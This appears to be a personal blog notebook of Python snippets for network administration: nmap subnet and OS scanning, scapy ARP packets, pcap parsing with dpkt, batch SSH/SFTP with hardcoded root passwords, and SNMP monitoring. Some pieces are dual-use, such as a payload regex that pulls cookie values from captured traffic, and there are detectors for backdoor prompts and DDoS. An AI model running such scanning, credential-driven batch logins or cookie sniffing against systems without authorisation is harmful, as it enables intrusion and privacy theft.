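These are code snippets I have written. This is a cut-down version: there is no multithreading and nothing of real value is implemented. It is only a scratch notebook that records some of my thinking while coding. I am not publishing the complete, useful versions; assemble those yourself. None of this is technically sophisticated. I never studied Python seriously and the code was written casually, so experts, please go easy on me and make do with it.
My impressions of Python: Python is simple to use, some problems are easier to solve in it than in other languages, and its rich set of third-party libraries makes development very efficient. That can create the illusion of being able to do anything, which is dangerous because it breeds complacency. Python exists to save experts development time. In an expert's hands it is a sharp tool; in a beginner's hands it makes it too easy to feel "satisfied". Beginners should avoid programming in Python: it hides implementation details, so you never learn what is really going on, and however well you write it, Python code is still just a script. If you like getting to the bottom of things, C/C++ is a good choice and will teach you a great deal.
The reason: imagine that a third-party Python library stops being updated or stops working. What do you do then? Give up programming? The point of reinventing the wheel is not to use the wheel you built, but to understand the principles well enough to solve the problem even in extreme circumstances (that is what makes a real programmer). Python feels simple because you are standing on the shoulders of giants. If the giant refuses to lend you a shoulder, you may be unable to do even the most basic things, and that is a desperate position to be in. C++ is more complex, but using it leaves you on firmer ground.
Final summary: the sense of competence these snippets give me is only an illusion. I do not understand how many of these libraries work internally, and I am still a novice, a script kiddie stacking building blocks. Right now I want to go back to C/C++ and drop Python entirely, because too many details are hidden, which does not help learning. Of course, when any two languages accomplish the same task, the process differs but the result is the same. A language is only a tool, the clothing of thought, and a program is a by-product of thought. There is no good or bad, only whether the tool fits, whether it suits you, and whether it lets you learn more. Python keeps most of its internals out of sight, while C/C++ exposes everything and lets you study how things really work. Once you have learned that, you can come back to Python with confidence and experiment boldly, because you know what is happening underneath and can weigh the trade-offs yourself.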
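Enough talk; on to the code. The first example is a simple hand-rolled way to handle command-line options that take no values.
import sys

if len(sys.argv) < 2:
    print("No arguments given")
    sys.exit()
if sys.argv[1].startswith("-"):
    option = sys.argv[1][1:]
    if option == "version":
        print("Version info")
    elif option == "help":
        print("Help menu")
    else:
        print("Unknown option")
        sys.exit()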
We can also write an interactive shell, which makes running commands more flexible. Usage looks like: [Shell] # ls
# coding:utf-8
import os

def add(x, y):
    # Arguments arrive as strings, so "+" concatenates them.
    print("Concatenated:", x + y)

def clear():
    # "cls" only exists on Windows; use "clear" elsewhere.
    os.system("cls" if os.name == "nt" else "clear")

def main():
    while True:
        try:
            cmd = input("[Shell] # ").split()
            cmd_len = len(cmd)
            if not cmd:  # split() returns an empty list for blank input
                continue
            elif cmd[0] == "exit":
                exit(1)
            elif cmd[0] == "clear":
                clear()
            elif cmd[0] == "add":
                if cmd_len - 1 >= 2:
                    add(cmd[1], cmd[2])
                else:
                    print("add: wrong arguments, pass at least 2")
            else:
                print("Command not found")
        except Exception:
            continue

if __name__ == '__main__':
    main()
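The built-in cmd library can also provide interactive commands: each do_xxxx() method becomes a command.
import sys
from cmd import Cmd

class BingCmd(Cmd):
    prompt = "[Shell] #"

    def preloop(self):
        print("hello world")

    def do_bing(self, argv):
        print("Argument passed: {}".format(argv))
        self.prompt = "bing >"  # assign through self, or the prompt never changes

    def help_bing(self):
        print("Help text for the bing command")

    def emptyline(self):
        print("Called when an empty line is entered")

    def default(self, line):
        print("Called when the command is not recognised")

    def do_exit(self, argv):  # every do_* handler receives the argument string
        sys.exit()

if __name__ == "__main__":
    BingCmd().cmdloop()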
Larger projects are better organised with classes. The following code passes command-line options through a class.
'''http://patorjk.com/software/taag'''
#coding:utf-8
import optparse

class MyClass:
    def __init__(self):
        usage = ''' 123'''
        parser = optparse.OptionParser(usage=usage)
        parser.add_option("-s", "--server", type="string", dest="server", help="your server IP")
        parser.add_option("-p", "--port", type="int", dest="port", help="your server port")
        self.options, self.args = parser.parse_args()
        parser.print_help()

    def check(self):
        # Both options are required; exit if either is missing.
        if not self.options.server or not self.options.port:
            exit()

    def run(self, ip, port):
        try:
            print("Arguments received, ready to run!")
            for i in range(0, 100):
                print(ip, port)
        except Exception:
            print("[ - ] Not Generate !")

if __name__ == '__main__':
    opt = MyClass()
    opt.check()
    ip = opt.options.server
    port = opt.options.port
    # Missing options are None, not the string "None".
    if ip is not None and port is not None:
        opt.run(ip, port)
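optparse has been deprecated in the standard library in favour of argparse. As a rough sketch of the same two options with argparse (the build_parser helper name is my own, not from the original code), required=True replaces the manual check:

```python
import argparse

def build_parser():
    # Hypothetical helper: mirrors the -s/--server and -p/--port options above.
    parser = argparse.ArgumentParser(description="demo option parser")
    parser.add_argument("-s", "--server", required=True, help="your server IP")
    parser.add_argument("-p", "--port", type=int, required=True, help="your server port")
    return parser

# Parse an explicit list here; call parse_args() with no argument to read sys.argv.
args = build_parser().parse_args(["-s", "192.168.1.20", "-p", "22"])
print(args.server, args.port)
```

With required=True, argparse prints the usage text and exits by itself when an option is missing.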
Constructing a packet
from scapy.all import Ether
from scapy.all import ARP
from scapy.all import srp
ether = Ether(src="00:00:00:00:00:00",dst="FF:FF:FF:FF:FF:FF")
arp = ARP(op=1,hwsrc="00:00:00:00:00:00",hwdst="FF:FF:FF:FF:FF:FF",psrc="192.168.1.2",pdst="255.255.255.255")
send = ether/arp
res = srp(send,timeout=3,verbose=0)
Extracting key data with nmap
import numpy as np
from pylab import *
import nmap

n = nmap.PortScanner()
ret = n.scan(hosts="192.168.1.0/24", arguments="-O")
#print(n["192.168.1.20"]['addresses']['ipv4'])
print(ret)

>>> ret["nmap"]["command_line"]
"nmap -O 192.168.1.20"
>>> ret["nmap"]["scanstats"]["timestr"]
'Thu Mar 19 19:20:08 2020'
>>> ret["nmap"]["scanstats"]["uphosts"]
'4'
>>> ret["nmap"]["scanstats"]["totalhosts"]
'256'
>>> n.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.20"]["addresses"]
{'ipv4': '192.168.1.20', 'mac': '00:50:56:22:6F:D3'}
>>> ret["scan"]["192.168.1.20"]["addresses"]["ipv4"]
'192.168.1.20'
>>> ret["scan"]["192.168.1.20"]["addresses"]["mac"]
'00:50:56:22:6F:D3'
>>> ret["scan"]["192.168.1.20"]["tcp"].keys()
dict_keys([21, 22, 80, 139, 445, 3306])
>>> ret["scan"]["192.168.1.20"]["osmatch"][0]["name"]
'Linux 3.2 - 4.9'
>>> list(ret["scan"]["192.168.1.10"]["vendor"].values())[0]
'Elitegroup Computer System CO.'

def aaa():
    mpl.rcParams['font.sans-serif'] = ['KaiTi']
    label = "windows xp", "windows 7", "Windows 8", "Linux 4", "Centos 6", "Huawei switch"
    fracs = [1, 2, 3, 4, 5, 1]
    plt.axes(aspect=1)
    plt.pie(x=fracs, labels=label, autopct="%0d%%")
    plt.show()
Putting nmap to work: tallying the results
import os,sys

number = [80,8080,3306,3389,1433,1433,1433]
flag = {}
list_num = set(number)
for item in list_num:
    num = str(number.count(item))
    flag[item] = num
print(flag)
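The set-plus-count() loop above rescans the list once per distinct port. A minimal sketch of the same tally with collections.Counter from the standard library, using the same sample port list:

```python
from collections import Counter

ports = [80, 8080, 3306, 3389, 1433, 1433, 1433]
counts = Counter(ports)        # maps each port to how many times it occurs
print(dict(counts))
print(counts.most_common(1))   # the most frequent port with its count
```

A Counter returns 0 for a port that never appeared, which avoids the None values that dict.get() gives without a default.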
--------------------------------------------------------------------------
>>> Nmap.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.1"]["tcp"].keys()
dict_keys([80, 1900])
>>> for item in Nmap.all_hosts():
...     ret["scan"][item]["tcp"].keys()
...
dict_keys([80, 1900])
dict_keys([100, 135, 139, 443, 902, 912, 1433, 2869, 3389])
dict_keys([135, 139, 445, 5357])
>>> a = ret["scan"]["192.168.1.20"]["tcp"].keys()
>>> list(a)
[21, 22, 80, 139, 445, 3306]
--------------------------------------------------------------------------
import os
import nmap

def ScanPort():
    port = []
    flag = {}
    dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0}
    Nmap = nmap.PortScanner()
    ret = Nmap.scan(hosts="192.168.1.0/24",arguments="-PS")
    for item in Nmap.all_hosts():
        # Hosts with no open TCP ports have no "tcp" key.
        temp = list(ret["scan"][item].get("tcp", {}).keys())
        port.extend(temp)
    list_num = set(port)
    print(list_num)
    for item in list_num:
        flag[item] = port.count(item)
    # Default to 0 so a port that never appeared does not become None.
    dic["WebServer"] = flag.get(80, 0)
    dic["MySQL"] = flag.get(3306, 0)
    dic["SSH"] = flag.get(22, 0)
    dic["MSSQL"] = flag.get(1433, 0)
    print(dic)

ScanPort()

C:\Users\LyShark\Desktop>python main.py
{55555, 3, 902, 135, 139, 9102, 912, 21, 22, 1433, 1062, 425, 2601, 14000, 55600, 2869, 443, 3389, 445, 3905, 1352, 8654, 80, 82, 212, 100, 616, 3306, 1900, 5357}
{'WebServer': 3, 'MySQL': 1, 'SSH': 1, 'MSSQL': 0}
Charting nmap results: frequent scanning can crash the script, and the fix is exception handling.
import os,nmap
import numpy as np
from matplotlib.pylab import *
# pip install numpy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple

def ScanPort():
    port = []
    flag = {}
    dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0}
    Nmap = nmap.PortScanner()
    try:
        ret = Nmap.scan(hosts="192.168.1.0/24",arguments="-PS")
    except Exception as error:
        # A failed scan should not take the whole script down.
        print("Scan failed: {}".format(error))
        return
    for item in Nmap.all_hosts():
        temp = list(ret["scan"][item].get("tcp", {}).keys())
        port.extend(temp)
    list_num = set(port)
    for item in list_num:
        flag[item] = port.count(item)
    # Default to 0: plt.pie() cannot plot None.
    dic["WebServer"] = flag.get(80, 0)
    dic["MySQL"] = flag.get(3306, 0)
    dic["SSH"] = flag.get(22, 0)
    dic["MSSQL"] = flag.get(1433, 0)
    print(dic)
    mpl.rcParams['font.sans-serif'] = ['KaiTi']
    label = list(dic.keys())
    fracs = list(dic.values())
    plt.axes(aspect=1)
    plt.pie(x=fracs,labels=label,autopct="%0d%%")
    plt.savefig('port.png')

ScanPort()
Unpacking traffic with dpkt
import re
import dpkt
import socket
import geoip2.database
import argparse

# data: the raw bytes of one captured Ethernet frame
p = dpkt.ethernet.Ethernet(data)
if p.data.__class__.__name__ == "IP":
    if p.data.data.__class__.__name__ == "TCP":
        # A port cannot be 80 and 443 at once, so the test uses "or".
        if p.data.data.dport == 80 or p.data.data.dport == 443:
            payload = p.data.data.data
            if b'www.com' in payload:
                recv = re.findall(b'[1-9][0-9]{4,}', payload)
                if len(recv):
                    print('{}'.format(bytes.decode(recv[0]).replace('o_cookie=','')))

def GetPcap(pcap):
    ret = []
    for timestamp,packet in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(packet)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            # print("[+] source: %-16s --> destination: %-16s"%(src,dst))
            ret.append(dst)
        except Exception:
            pass  # skip non-IP frames
    return set(ret)
A geolocation tool: only the basic version of this address lookup tool is published here; the full version is not suitable for release.
import dpkt
import socket
import geoip2.database
import argparse

def GetPcap(pcap):
    ret = []
    for timestamp,packet in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(packet)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            # print("[+] source: %-16s --> destination: %-16s"%(src,dst))
            ret.append(dst)
        except Exception:
            pass  # skip non-IP frames
    return set(ret)

def retKML(addr,longitude,latitude):
    # KML coordinates are written as longitude,latitude.
    kml = (
        '<Placemark>\n'
        '<name>%s</name>\n'
        '<Point>\n'
        '<coordinates>%6f,%6f</coordinates>\n'
        '</Point>\n'
        '</Placemark>\n'
    ) % (addr, longitude, latitude)
    return kml

if __name__ == '__main__':
    # Usage: main.py -p data.pcap -d GeoLite2-City.mmdb (analyse the IPs in the capture)
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--pcap", dest="pcap_file", help="set -p *.pcap")
    parser.add_argument("-d", "--mmdb", dest="mmdb_file", help="set -d *.mmdb")
    args = parser.parse_args()
    if args.pcap_file and args.mmdb_file:
        fp = open(args.pcap_file,'rb')
        pcap = dpkt.pcap.Reader(fp)
        addr = GetPcap(pcap)
        reader = geoip2.database.Reader(args.mmdb_file)
        kmlheader = '<?xml version="1.0" encoding="UTF-8"?>\n<kml xmlns="http://www.opengis.net/kml/2.2">\n<Document>\n'
        with open("GoogleEarth.kml", "w") as f:
            f.write(kmlheader)
        for item in addr:
            try:
                response = reader.city(item)
                print("IP address: %-16s --> " %item,end="")
                print("Network: %-16s --> " %response.traits.network,end="")
                print("Region: {}".format(response.country.names["zh-CN"]),end="\n")
                with open("GoogleEarth.kml","a+") as f:
                    # The original passed latitude first, which swapped the coordinates.
                    f.write(retKML(item,response.location.longitude, response.location.latitude))
            except Exception:
                pass  # address not found in the database
        kmlfooter = '</Document>\n</kml>\n'
        with open("GoogleEarth.kml", "a+") as f:
            f.write(kmlfooter)
    else:
        parser.print_help()
By default this writes a KML file, GoogleEarth.kml, which you can import into Google Earth.
Checking traffic legitimacy with dpkt: capture packets with Wireshark, then analyse the traffic with dpkt. This is commonly used in network forensics.
import dpkt
import socket

# FindPcapWord checks whether a URL contains a sensitive keyword
def FindPcapWord(pcap,WordKey):
    for timestamp,packet in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(packet)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            tcp = ip.data
            http = dpkt.http.Request(tcp.data)
            if http.method == "GET":
                uri = http.uri.lower()
                if WordKey in uri:
                    print("[+] source: {} --> destination: {} URL contains {}".format(src,dst,uri))
        except Exception:
            pass

# FindHivemind checks whether a packet contains sensitive strings
def FindHivemind(pcap):
    for timestamp,packet in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(packet)
            ip = eth.data
            tcp = ip.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            sport = tcp.sport
            dport = tcp.dport
            # print("[+] source: {}:{} --> destination: {}:{}".format(src,sport,dst,dport))
            if dport == 80 and dst == "125.39.247.226":
                # A plaintext command prompt in the stream suggests a backdoor.
                # tcp.data is bytes, so the needle must be bytes as well.
                if b'[cmd]# ' in tcp.data.lower():
                    print("[+] {}:{}".format(dst,dport))
        except Exception:
            pass

# Detect whether a host is under DDoS attack.
def FindDDosAttack(pcap):
    pktCount = {}
    for timestamp,packet in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(packet)
            ip = eth.data
            tcp = ip.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            dport = tcp.dport
            # Count how often each source hits port 80 on each destination.
            if dport == 80:
                stream = src + ":" + dst
                if stream in pktCount:  # dict.has_key() no longer exists in Python 3
                    pktCount[stream] = pktCount[stream] + 1
                else:
                    pktCount[stream] = 1
        except Exception:
            pass
    for stream in pktCount:
        pktSent = pktCount[stream]
        # More than the threshold of 500 packets is treated as a DDoS attack.
        if pktSent > 500:
            src = stream.split(":")[0]
            dst = stream.split(":")[1]
            print("[+] source: {} attacked: {} traffic: {} pkts.".format(src,dst,str(pktSent)))

if __name__ == "__main__":
    fp = open("D://data.pcap","rb")
    pcap = dpkt.pcap.Reader(fp)
    FindPcapWord(pcap,"wang.zip")
A simple batch SSH command runner:
import os,paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

def BatchCMD(address,username,password,port,command):
    try:
        ssh.connect(hostname=address,username=username,password=password,port=port,timeout=2)
        stdin , stdout , stderr = ssh.exec_command(command)
        result = stdout.read()
        if len(result) != 0:
            print('\033[0mIP: {} UserName:{} Port: {} Status: OK'.format(address,username,port))
            return 1
        else:
            print('\033[45mIP: {} UserName:{} Port: {} Status: Error'.format(address,username,port))
            return 0
    except Exception:
        print('\033[45mIP: {} UserName:{} Port: {} Status: Error'.format(address, username, port))
        return 0

if __name__ == "__main__":
    # ip.log holds one address per line
    with open("ip.log","r") as fp:
        for temp in fp:
            ip = temp.strip()
            if ip:
                BatchCMD(ip, "root", "1233", 22, "ls && echo $?")
A simple batch SFTP transfer:
import paramiko

def BatchSFTP(address,username,password,port,source,target,flag):
    transport = paramiko.Transport((address, int(port)))
    try:
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)
        # put() and get() raise on failure, so reaching the print means success.
        if flag == "PUT":
            sftp.put(source, target)
        elif flag == "GET":
            target = str(target + "_" + address)
            sftp.get(source, target)
        else:
            return 0
        print("Addr:{} UserName:{} Source:{} Target:{} Success".format(address,username,source,target))
        return 1
    except Exception:
        print("Addr:{} UserName:{} Source:{} Target:{} Error".format(address,username,source,target))
        return 0
    finally:
        # Always close the transport; the original closed it after return, where it never ran.
        transport.close()

if __name__ == "__main__":
    # Upload the local file ./main.py to /tmp/main.py
    BatchSFTP("192.168.1.20","root","1233","22","./main.py","/tmp/main.py","PUT")
    # Copy /tmp/main.py from the target host to ./get/test.py_<address>
    BatchSFTP("192.168.1.20","root","1233","22","/tmp/main.py","./get/test.py","GET")
Reading system memory data over SSH: a simple script that fetches memory figures. CPU, disk and other data can be collected the same way.
import os,paramiko,re

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

def SSH_Get_Mem():
    result = {}
    values = []
    head = ["MemTotal","MemFree","Cached","SwapTotal","SwapFree"]
    ssh.connect(hostname="192.168.1.20", username="root", password="1233", port=22, timeout=2)
    stdin, stdout, stderr = ssh.exec_command('cat /proc/meminfo')
    # Decode the bytes; str() on bytes would keep the b'...' wrapper and literal \n.
    lines = stdout.read().decode().split("\n")
    for i in [0,1,4,14,15]:  # pick these lines; their positions vary between kernels
        values.append(lines[i].split(":")[1].replace(" kB","").strip())
    for name, value in zip(head, values):
        result[name] = int(value)  # combine into a dictionary
    return result

if __name__ == "__main__":
    for i in range(10):
        dic = SSH_Get_Mem()
        print(dic)
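Picking lines 0, 1, 4, 14 and 15 only works when /proc/meminfo happens to list its fields in that order. A small sketch that selects fields by name instead; parse_meminfo is a hypothetical helper and the sample text is made up for illustration:

```python
def parse_meminfo(text, keys=("MemTotal", "MemFree", "Cached", "SwapTotal", "SwapFree")):
    """Return {field: value in kB} for the requested fields found in text."""
    wanted = set(keys)
    result = {}
    for line in text.splitlines():
        name, sep, rest = line.partition(":")
        if sep and name in wanted:
            result[name] = int(rest.split()[0])  # drop the trailing "kB"
    return result

# Made-up sample in the /proc/meminfo layout
sample = """MemTotal:        2028088 kB
MemFree:          157340 kB
Buffers:           20312 kB
Cached:           612208 kB
SwapTotal:       2097148 kB
SwapFree:        2096884 kB"""
print(parse_meminfo(sample))
```

In the SSH version, the text passed in would be the decoded output of the cat /proc/meminfo command.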
Fabric tips: fabric is another handy tool for automated operations. It is a higher-level wrapper built on top of paramiko.
# Run a command
from fabric import Connection
conn = Connection(host="192.168.1.10",user="root",port=22,connect_kwargs={"password":"123"})
try:
    with conn.cd("/var/www/html/"):
        ret = conn.run("ls -lh",hide=True)
        # format() avoids a TypeError from concatenating str with the integer port
        print("Host: {} port: {} done".format(conn.host, conn.port))
except Exception:
    print("Host: {} port: {} failed".format(conn.host, conn.port))

# Read data back to the local machine
from fabric import Connection
conn = Connection(host="192.168.1.20",user="root",port=22,connect_kwargs={"password":"123"})
uname = conn.run('uname -s', hide=True)
if 'Linux' in uname.stdout:
    command = "df -h / | tail -n1 | awk '{print $5}'"
    print(conn.run(command,hide=True).stdout.strip())

# Upload and download files
from fabric import Connection
conn = Connection(host="192.168.1.20",user="root",port=22,connect_kwargs={"password":"123"})
conn.put("D://zabbix_get.exe","/tmp/zabbix.exe")  # upload
conn.get("/tmp/zabbix.exe","./zab.exe")           # download
Collecting host CPU utilisation over SNMP: query the target host's CPU utilisation (percentages) over SNMP and return it as a dictionary that can be serialised to JSON.
import os,re,time

def Get_CPU_Info(addr):
    try:
        Head = ["HostName","CoreLoad","CpuUser","CpuSystem","CpuIdle"]
        CPU = []
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
        CPU.append(ret.read().split(":")[3].strip())
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.25.3.3.1.2")
        CPU.append(ret.read().split(":")[3].strip())
        for i in [9,10,11]:
            ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " 1.3.6.1.4.1.2021.11.{}.0".format(i))
            ret = ret.read()
            Info = ret.split(":")[3].strip()
            CPU.append(Info)
        return dict(zip(Head,CPU))
    except Exception:
        return 0

if __name__ == '__main__':
    for i in range(100):
        dic = Get_CPU_Info("192.168.1.20")
        print(dic)
        time.sleep(1)
Reading system load over SNMP: fetch the 1, 5 and 15 minute load averages and return them as a dictionary.
import os,re,time

def Get_Load_Info(addr):
    try:
        Head = ["HostName","Load1","Load5","Load15"]
        SysLoad = []
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
        SysLoad.append(ret.read().split(":")[3].strip())
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.10.1.3")
        load = list(re.sub(".*STRING: ", "", ret.read()).split("\n"))
        SysLoad.append(load[0])
        SysLoad.append(load[1])
        SysLoad.append(load[2])
        return dict(zip(Head,SysLoad))
    except Exception:
        return 0

if __name__ == '__main__':
    dic = Get_Load_Info("192.168.1.20")
    print(dic)
Reading system memory usage over SNMP
import os,re,time

def Get_Mem_Info(addr):
    try:
        Head = ["HostName","memTotalSwap","memAvailSwap","memTotalReal","memTotalFree"]
        SysMem = []
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
        SysMem.append(ret.read().split(":")[3].strip())
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.4")
        mem = ret.read().split("\n")
        for i in [2,3,4,6]:
            SysMem.append(re.sub(".*INTEGER: ","",mem[i]).split(" ")[0])
        return dict(zip(Head,SysMem))
    except Exception:
        return 0

if __name__ == '__main__':
    dic = Get_Mem_Info("192.168.1.20")
    print(dic)
Reading disk data over SNMP: this example is incomplete. I only wrote part of it, and one later problem was never solved.
import os,re,time

def Get_Disk_Info(addr):
    try:
        disks = []
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageDescr")
        DiskName = ret.read().split("\n")
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageUsed")
        DiskUsed = ret.read().split("\n")
        ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageSize")
        DiskSize = ret.read().split("\n")
        for i in range(1,len(DiskName) - 7):
            # Build a fresh dict per entry; appending one shared dict made every row identical.
            dic = {}
            dic["Name"] = DiskName[i + 5].split(":")[3]
            dic["Used"] = DiskUsed[i + 5].split(":")[3]
            dic["Size"] = DiskSize[i + 5].split(":")[3]
            disks.append(dic)
        return disks
    except Exception:
        return 0

if __name__ == '__main__':
    disks = Get_Disk_Info("192.168.1.20")
    print(disks)
Writing log entries to a file
import os,re,time

def WriteFileLog(filename,log):
    # "a+" creates the file when it is missing, so no existence check is needed.
    # The original created a missing file but skipped the first write.
    with open(filename,"a+") as fp:
        fp.write(log+"\n")

if __name__ == "__main__":
    dic = {"admin":"123123"}
    WriteFileLog("test.log",str(dic))
Computing the timestamps in a time range: list every timestamp between two given times, so that a time interval can be located by timestamp.
import os
import sys
import time,datetime

# start = 2019-12-10 14:49:00
# end = 2019-12-10 14:50:00
def ReadLog(log,start,ends):
    find_list = []
    start_time = int(time.mktime(time.strptime(start,"%Y-%m-%d %H:%M:%S")))
    end_time = int(time.mktime(time.strptime(ends,"%Y-%m-%d %H:%M:%S")))
    while start_time <= end_time:
        find_list.append(start_time)
        start_time = start_time + 1
    print(find_list)

ReadLog("./cpu.log","2019-12-10 14:49:00","2019-12-10 14:50:00")
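The loop above builds every timestamp in a list. As a sketch of an alternative, a range object covers the same interval lazily and supports fast membership tests, which is what locating a log entry by timestamp needs. stamp_range is a hypothetical helper name:

```python
import time

FMT = "%Y-%m-%d %H:%M:%S"

def stamp_range(start, end):
    """Return a range of the integer timestamps from start to end, inclusive."""
    first = int(time.mktime(time.strptime(start, FMT)))
    last = int(time.mktime(time.strptime(end, FMT)))
    return range(first, last + 1)

stamps = stamp_range("2019-12-10 14:49:00", "2019-12-10 14:50:00")
print(len(stamps))               # one entry per second, both ends included
print(stamps[0] + 30 in stamps)  # membership test without building a list
```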
Querying DNS records with the dnspython module
# pip install dnspython
import os
import dns.resolver

domain = "baidu.com"
# resolve() is the dnspython 2.x name; query() is the older, now deprecated spelling
A = dns.resolver.resolve(domain,"A")
for x in A.response.answer:
    for y in x.items:
        print("A record found: {} ".format(y))
print("*"*50)
MX = dns.resolver.resolve(domain,"MX")
for x in MX:
    print("MX preference {} MX record: {} ".format(x.preference,x.exchange))
print("*"*50)
NS = dns.resolver.resolve(domain,"NS")
for x in NS.response.answer:
    for y in x.items:
        print("NS name server: {} ".format(y.to_text()))
Diffing two files: Python's built-in modules are enough to compare two files and produce an HTML report.
import os
import difflib

def ReadFile(filename):
    try:
        with open(filename,"r") as fp:
            return fp.read().splitlines()
    except IOError as error:
        print("Failed to read file. {}".format(str(error)))

def DiffFile(file1,file2):
    text1 = ReadFile(file1)
    text2 = ReadFile(file2)
    diff = difflib.HtmlDiff()
    html = diff.make_file(text1,text2)
    with open("./diff.html","w") as fp:
        fp.write(html)

DiffFile("C://old.txt","C://new.txt")
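When an HTML report is more than is needed, difflib can also produce a plain-text unified diff. A minimal sketch on two in-memory line lists; the sample lines and file names are made up for illustration:

```python
import difflib

old = ["alpha", "beta", "gamma"]
new = ["alpha", "BETA", "gamma", "delta"]

# lineterm="" because the input lines carry no trailing newlines
diff = list(difflib.unified_diff(old, new, fromfile="old.txt", tofile="new.txt", lineterm=""))
print("\n".join(diff))
```

Lines starting with "-" exist only in the old text and lines starting with "+" only in the new one.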
Walking a directory by hand: recursively collect the files under a given directory.
import os

def list_all_files(rootdir):
    _files = []
    names = os.listdir(rootdir)
    for name in names:
        path = os.path.join(rootdir,name)
        if os.path.isdir(path):
            _files.extend(list_all_files(path))
        if os.path.isfile(path):
            _files.append(path)
    return _files

files = list_all_files("D:/sqlite")
print(files)
Walking files with os.walk: a simpler way to traverse files and directories.
import os

# files and directories, bottom-up
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
    for name in files:
        print(os.path.join(root, name))
    for name in dirs:
        print(os.path.join(root, name))

import os

# directories only
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
    for name in dirs:
        print(os.path.join(root, name))

import os

# files only
for root,dirs,files in os.walk(os.getcwd()):
    for file in files:
        print(os.path.join(root,file))
Joining paths to find files of a given type
import os

def spider(script_path,script_type):
    final_files = []
    for root, dirs, files in os.walk(script_path, topdown=False):
        for fi in files:
            dfile = os.path.join(root, fi)
            if dfile.endswith(script_type):
                # normalise Windows backslashes to forward slashes
                final_files.append(dfile.replace("\\","/"))
    print("[+] Found {} PHP files".format(len(final_files)))
    return final_files

PagePath = spider("D://phpstudy/WWW/xhcms","php")
print(PagePath)
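The same search can be sketched with pathlib from the standard library, where rglob() does the recursion and as_posix() yields forward slashes on every platform. find_files is a hypothetical helper name:

```python
from pathlib import Path

def find_files(root, suffix):
    """Return sorted forward-slash paths of files under root whose names end with suffix."""
    return sorted(p.as_posix() for p in Path(root).rglob("*" + suffix) if p.is_file())

# Example: every .py file below the current directory
print(find_files(".", ".py"))
```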
A simple DingTalk alert
import requests
import sys
import json

dingding_url = 'https://oapi.dingtalk.com/robot/send?access_token=6d11af32'
data = {"msgtype": "markdown","markdown": {"title": "Monitoring","text": "apache error"}}
headers = {'Content-Type':'application/json;charset=UTF-8'}
send_data = json.dumps(data).encode('utf-8')
requests.post(url=dingding_url,data=send_data,headers=headers)
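Generating a random verification code
import sys
import random

rand = []
for x in range(6):
    y = random.randrange(0,5)
    if y == 2 or y == 4:
        num = random.randrange(0,10)  # randrange excludes the upper bound; 0-10 yields digits 0-9
        rand.append(str(num))
    else:
        temp = random.randrange(65,91)  # ASCII codes for A-Z
        c = chr(temp)
        rand.append(c)
result = "".join(rand)
print(result)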
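The random module is not meant for security-sensitive values. If the code is used for something like login verification, a sketch with the standard-library secrets module may be a better fit. make_code is a hypothetical helper name:

```python
import secrets
import string

def make_code(length=6):
    """Return a random code of uppercase letters and digits."""
    alphabet = string.ascii_uppercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(make_code())
```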
Generating an XLS report
import os
import xlwt
import time

def XLSWrite():
    workbook = xlwt.Workbook(encoding="utf-8")
    sheet = workbook.add_sheet("Main title")
    sheet.write(0,0,"ID")
    sheet.write(0,1,"Content")
    for i in range(0,10):
        sheet.write(i+1,0,i)
        sheet.write(i+1,1,i)
    times = time.time()
    workbook.save("{}.xls".format(times))
    if os.path.exists("{}.xls".format(times)):
        print("Saved")

if __name__ == "__main__":
    XLSWrite()
Reading system data with psutil
import psutil

cpu = psutil.cpu_times()
# cpu_times() reports cumulative seconds, not percentages
print("CPU user time: {}".format(cpu.user))
print("CPU idle time: {}".format(cpu.idle))
print("Logical CPU count: {}".format(psutil.cpu_count()))
print("Physical CPU count: {}".format(psutil.cpu_count(logical=False)))
print("-"*50)
mem = psutil.virtual_memory()
print("Total memory: {}".format(mem.total))
print("Used memory: {}".format(mem.used))
print("Free memory: {}".format(mem.free))
print("Swap used: {}".format(psutil.swap_memory().used))
print("-"*50)
print("All partitions: {}".format(psutil.disk_partitions()))
print("Usage of mount point /: {}".format(psutil.disk_usage("/")))
print("Total disk IO: {}".format(psutil.disk_io_counters()))
print("IO per disk: {}".format(psutil.disk_io_counters(perdisk=True)))
print("-"*50)
print("Network IO: {}".format(psutil.net_io_counters()))
